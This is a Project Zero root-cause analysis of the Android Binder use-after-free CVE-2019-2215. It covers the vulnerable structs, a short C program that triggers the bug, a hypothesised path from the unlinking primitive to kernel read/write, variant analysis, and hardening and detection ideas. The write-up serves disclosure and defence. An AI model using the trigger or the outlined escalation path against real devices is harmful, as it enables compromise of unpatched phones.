Maddie Stone, Project Zero (Originally posted on Project Zero blog 2020-07-27)

The Basics

Disclosure or Patch Date: 26 September 2019

Product: Google Android

Advisory: https://source.android.com/security/bulletin/2019-10-01#kernel-b

Affected Versions: Pre-Oct 6 2019 SPL for devices released prior to Fall 2019

First Patched Version: 6 Oct 2019 SPL+

Issue/Bug Report: https://bugs.chromium.org/p/project-zero/issues/detail?id=1942

Patch CL: https://android-review.googlesource.com/c/kernel/common/+/609966

Bug-Introducing CL: Unknown

Reporter(s): Maddie Stone of Google Project Zero

The Code

Proof-of-concept: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414885

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? No

The Vulnerability

**Bug class:**use-after-free (UAF)

Vulnerability details:

The vulnerability is a use-after-free (UAF) in the Binder kernel driver. The binder_thread struct, defined in drivers/android/binder.c, has the member wait of the wait_queue_head_t struct type. wait is still referenced by a pointer in epoll, even after the binder_thread struct containing it is freed.

struct binder_thread {
        struct binder_proc *proc;
        struct rb_node rb_node;
        struct list_head waiting_thread_node;
        int pid;
        int looper;              /* only modified by this thread */
        bool looper_need_return; /* can be written by other thread */
        struct binder_transaction *transaction_stack;
        struct list_head todo;
        bool process_todo;
        struct binder_error return_error;
        struct binder_error reply_error;
        wait_queue_head_t wait;
        struct binder_stats stats;
        atomic_t tmp_ref;
        bool is_dead;
        struct task_struct *task;
};
struct __wait_queue_head {
        spinlock_t              lock;
        struct list_head        task_list;
};
typedef struct __wait_queue_head wait_queue_head_t;

The BINDER_THREAD_EXIT ioctl calls the binder_thread_release function which frees the binder_thread struct. However, if epoll is called on this thread, binder_poll tells epoll to use wait, the wait queue that is embedded in the binder_thread struct. Therefore, when the binder_thread struct is freed, epoll is pointing to the now freed wait queue. Normally, the wait queue used for polling on a file is guaranteed to be alive until the file’s release handler is called. Rare cases require the use of POLLFREE. In contrast, the Binder driver only worked if you constantly removed and re-added the epoll watch. This is the underlying bug and the use-after-free is a symptom of that.

When we look at the stack trace from KASAN in the original report, we can see the use-after-free is in remove_wait_queue in kernel/sched/wait.c. The source code for the remove_wait_queue is below. In the remove_wait_queue function, q is the pointer to the freed wait_queue_head_t in the binder_thread struct and wait is an entry in the wait queue whose head has been freed. The use-after-free that triggered the KASAN crash is the call to spin_lock_irqsave with argument &q->lock when q is pointing to freed memory.

However, the \__remove_wait_queue call is more interesting for exploitation. As shown below, \__remove_wait_queue simply calls list_del on the task_list in the wait queue, giving us an unlinking primitive.

void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait)
{
        unsigned long flags;
        spin_lock_irqsave(&q->lock, flags);
        __remove_wait_queue(q, wait);
        spin_unlock_irqrestore(&q->lock, flags);
}
__remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
{
        list_del(&old->task_list);
}

The bug can be triggered with the following code, which was also in the original report from syzkaller.

#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define BINDER_THREAD_EXIT 0x40046208ul

int main()
{
        int fd, epfd;
        struct epoll_event event = { .events = EPOLLIN };
                
        fd = open("/dev/binder", O_RDONLY);
        epfd = epoll_create(1000);
        epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
        ioctl(fd, BINDER_THREAD_EXIT, NULL);
}

Patch analysis:

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

We do not have an exploit sample nor a timeline for when this 0-day was developed. It seems equally possible that the attackers found the bug prior to syzkaller in 2017 or they found it after by combing syzkaller reports for vulnerabilities that haven’t been included in the Android Security Bulletin.

Based on the information that led to the finding of this bug, we can assume that the attackers developed those documents after October 2018 because the Pixel 3 was released on Oct 18, 2018 and the docs claim that the Pixel 3 is unaffected. However, this does not tell us how long the attackers were holding onto the vulnerability: whether they found it prior to syzkaller or after.

(Historical/present/future) context of bug:

This bug was originally found and reported in November 2017 and patched in February 2018. Syzbot, a syzkaller system that continuously fuzzes the Linux kernel, originally reported the use-after-free bug to Linux kernel mailing lists and the syzkaller-bugs mailing list in November 2017. From this report, the bug was patched in the Linux 4.14, Android 3.18, Android 4.4, and Android 4.9 kernels in February 2018. However, this fix was never included in an Android monthly security bulletin and thus the bug was not patched at the time for many Android devices, including the Pixel and Pixel 2.

The Exploit

Is the exploit method known? Probably

Based on the detailed descriptions that were provided stating “CONFIG_DEBUG_LIST breaks the primitive” and "CONFIG_ARM64_UAO hinders exploitation", we can hypothesize that the exploit uses an unlinking primitive to exploit the use-after-free and then overwrites the address limit stored in the task_struct to obtain kernel read/write. If this hypothesis is correct, than this is a known exploit method.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):

We decided on 2 different approaches for variant analysis:

  1. Searching for any other vulnerabilities that were patched upstream, but not in already released devices.

    The information that led to the finding of this vulnerability specifically highlighted that the attacker knew the vulnerability was patched in the upstream kernel, but still affected released devices. Therefore, it seemed expected that there may be other vulnerabilities that also fell into this category and if they did, the attacker would be happy to still use them.

    To do this we compared the patch history for the Pixel 2 and the upstream Linux kernel for the Binder driver (/drivers/android/binder.c).

  2. Searching for any other kernel drivers whose poll handler uses a wait queue that is not tied to the lifetime of the file and thus could introduce a use-after free.

    This approach is to look for any other bug similar to the use-after-free pattern of this vulnerability. To do this variant analysis, we manually searched 214/236 files in the Linux 4.4 kernel where there is a call to poll_wait. We didn’t search the final 22 files because they appeared to be copies of other files that had already been reviewed.

    In the future, it would have been more efficient to write a static analysis query to search for this pattern rather than to do it manually.

Found variants:

  • CVE-2020-0030: Potential use-after-free due to race condition in binder_thread_release

The patch for the in-the-wild 0-day (CVE-2019-2215) actually introduced another use-after-free condition. It had been found by syzkaller in Feb 2018 and patched in the upstream Linux kernel and Android common kernels in Feb 2018, but also wasn’t patched in already released devices.

The race condition was introduced in the patch for CVE-2019-2215 with the addition of POLLFREE. A separate call to ep_remove_wait_queue (such as EPOLL_CTL_DEL) would race with POLLFREE and the freeing of the binder_thread struct such that in ep_remove_wait_queue you could get a UAF write into the spinlock in the wait_queue_head_t struct that was freed as a part of the binder_thread.

This variant was found using approach #1 described in the previous section.

Structural improvements

  • Syncing with upstream kernels. This would ensure that the Android Security Bulletin is taking the most up-to-date security fixes known for the upstream kernels and thus OEMs can ensure their previously released devices get those patches. Android has published guidance for how to do Linux stable merges.
  • Enable CONFIG_DEBUG_LIST by default for Android kernels to break the unlinking exploit primitive. Overall, this would make it much more difficult to exploit this vulnerability.
  • Memory tagging could make it more difficult to exploit use-after-free and other memory corruption vulnerabilities.
  • Using the "Fixes:" tag in patches that are fixing a bug introduced by another commit. This could have prevented the variant (CVE-2020-0030) from going unpatched originally if the original fix had been tagged "Fixes: 7a3cee43e935 (ANDROID: binder: remove waitqueue when thread exits.)".

0-day detection methods

In this case we never obtained a copy of the exploit sample so the proposed detections are based on the proof-of-concept exploit that we developed.

  • In the Android kernel, we could attempt to monitor for creating a series of iovec arrays, This isn’t likely to be effective because we only need 10 in this case which seems to be a somewhat reasonable number to allocate.
  • In the Android kernel, we could attempt to look for instances when an iov_base and/or iov_length change after they’ve been verified by rw_copy_check_uvector.

Other References